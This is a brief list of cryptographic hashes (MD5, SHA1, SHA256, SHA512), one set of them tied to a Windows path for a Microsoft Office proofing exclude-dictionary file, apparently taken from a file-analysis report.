SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84